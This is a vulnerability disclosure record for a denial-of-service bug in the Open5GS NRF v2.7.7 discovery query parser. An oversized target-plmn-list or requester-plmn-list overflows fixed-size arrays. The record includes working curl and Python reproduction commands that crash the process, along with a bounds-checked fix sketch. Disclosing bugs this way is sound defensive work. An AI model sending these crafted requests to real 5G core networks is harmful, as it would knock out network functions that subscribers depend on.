Submission #808511: Open5gs NRF v2.7.7 Denial of Service (details)

Title: Open5gs NRF v2.7.7 Denial of Service

Description:

### Open5GS Release, Revision, or Tag

v2.7.7

### Description

NRF crashes in the common discovery query parser when either `target-plmn-list` or `requester-plmn-list` contains more than `OGS_MAX_NUM_OF_PLMN` entries.

The discovery option stores both PLMN lists in fixed-size arrays of length 12:

```c
#define OGS_MAX_NUM_OF_PLMN 12
...
ogs_plmn_id_t target_plmn_list[OGS_MAX_NUM_OF_PLMN];
ogs_plmn_id_t requester_plmn_list[OGS_MAX_NUM_OF_PLMN];
```

However, request parsing calls `ogs_sbi_discovery_option_parse_plmn_list()` directly for both query parameters:

```c
discovery_option->num_of_target_plmn_list =
    ogs_sbi_discovery_option_parse_plmn_list(
        discovery_option->target_plmn_list, v);

discovery_option->num_of_requester_plmn_list =
    ogs_sbi_discovery_option_parse_plmn_list(
        discovery_option->requester_plmn_list, v);
```

and `ogs_sbi_parse_plmn_list()` copies each decoded PLMN into the supplied fixed-size array without any bounds check:

```c
ogs_plmn_id_build(plmn_list + num_of_plmn_list,
        atoi(PlmnId->mcc), atoi(PlmnId->mnc), strlen(PlmnId->mnc));
num_of_plmn_list++;
```

As a result, a PLMN list with 13 or more entries causes out-of-bounds writes and segmentation faults in the live process.

### Steps to reproduce

Oversized `target-plmn-list`:

```bash
payload=$(python3 - <<'PY'
import json
arr=[{"mcc":"001","mnc":"01"} for _ in range(13)]
print(json.dumps(arr, separators=(",",":")))
PY
)
curl --http2-prior-knowledge -m 5 -sS -i --get \
  'http://10.33.33.3/nnrf-disc/v1/nf-instances' \
  --data-urlencode 'target-nf-type=SMF' \
  --data-urlencode 'requester-nf-type=AMF' \
  --data-urlencode "target-plmn-list=$payload"
```

Oversized `requester-plmn-list`:

```bash
payload=$(python3 - <<'PY'
import json
arr=[{"mcc":"001","mnc":"01"} for _ in range(64)]
print(json.dumps(arr, separators=(",",":")))
PY
)
curl --http2-prior-knowledge -m 5 -sS -i --get \
  'http://10.33.33.3/nnrf-disc/v1/nf-instances' \
  --data-urlencode 'target-nf-type=SMF' \
  --data-urlencode 'requester-nf-type=AMF' \
  --data-urlencode "requester-plmn-list=$payload"
```

Then check:

```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' nrf
docker logs --tail 20 nrf
```

### Logs

```shell
Oversized `target-plmn-list`:
curl: (92) HTTP/2 stream 1 was not closed cleanly before end of the underlying stream
exited 139 2026-04-10T17:38:40.722393861Z

Oversized `requester-plmn-list`:
curl: (56) Recv failure: Connection reset by peer
exited 139 2026-04-10T17:32:59.315423742Z
```

### Expected behaviour

NRF should reject oversized PLMN list discovery parameters with a normal HTTP error response and remain running.

### Observed behaviour

The discovery request corrupts memory, the connection is aborted, and the NRF process exits with code `139`.

### eNodeB/gNodeB

Not required.

### UE Models and versions

Not required.
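A bounds-checked form of the copy loop described in the report, added here as an example of the missing check; it is not Open5GS's own code or its fix, the struct and type names are simplified stand-ins, and the 13- and 64-entry inputs are constructed to match the sizes used in the reproduction steps:

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Simplified stand-ins for the Open5GS types (an assumption, not the project's code). */
#define OGS_MAX_NUM_OF_PLMN 12
typedef struct { int mcc; int mnc; size_t mnc_len; } plmn_id_t;
typedef struct { const char *mcc; const char *mnc; } plmn_json_t; /* one decoded JSON element */
typedef struct {
    plmn_id_t target_plmn_list[OGS_MAX_NUM_OF_PLMN];
    int num_of_target_plmn_list;
} discovery_option_t;

/*
 * Bounds-checked version of the copy loop quoted in the report: writes at most
 * max_entries PLMNs into plmn_list and returns the count, or -1 when the input
 * has more entries than the array holds, so the caller can answer with an HTTP
 * error instead of writing past the end of the fixed-size array.
 */
int parse_plmn_list_checked(plmn_id_t *plmn_list, size_t max_entries,
                            const plmn_json_t *items, size_t num_items)
{
    if (num_items > max_entries)
        return -1;                         /* reject before touching the array */
    for (size_t i = 0; i < num_items; i++) {
        plmn_list[i].mcc = atoi(items[i].mcc);
        plmn_list[i].mnc = atoi(items[i].mnc);
        plmn_list[i].mnc_len = strlen(items[i].mnc);
    }
    return (int)num_items;
}

/* Mimics the NRF handling a target-plmn-list of n constructed {"001","01"} entries.
 * Returns 0 when the list fits and -1 when the caller must send an error response;
 * the process keeps running either way. */
int handle_target_plmn_list(size_t n)
{
    plmn_json_t items[64];                 /* 64 matches the larger PoC payload */
    if (n > sizeof(items) / sizeof(items[0]))
        return -1;
    for (size_t i = 0; i < n; i++) { items[i].mcc = "001"; items[i].mnc = "01"; }
    discovery_option_t opt;
    memset(&opt, 0, sizeof(opt));
    int rc = parse_plmn_list_checked(opt.target_plmn_list, OGS_MAX_NUM_OF_PLMN, items, n);
    if (rc < 0)
        return -1;                         /* oversized list: reject, do not crash */
    opt.num_of_target_plmn_list = rc;
    return 0;
}
```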
Source: https://github.com/open5gs/open5gs/issues/4459
User: LinJu (UID 97503)
Submitted: 2026-04-20 21:51 (1 month ago)
Moderated: 2026-05-16 12:09 (26 days later)
Status: Duplicate
VulDB entry: 364317 [Open5GS up to 2.7.7 NRF /lib/sbi/conv.c ogs_sbi_discovery_option_parse_plmn_list target-plmn-list denial of service]
Points: 0
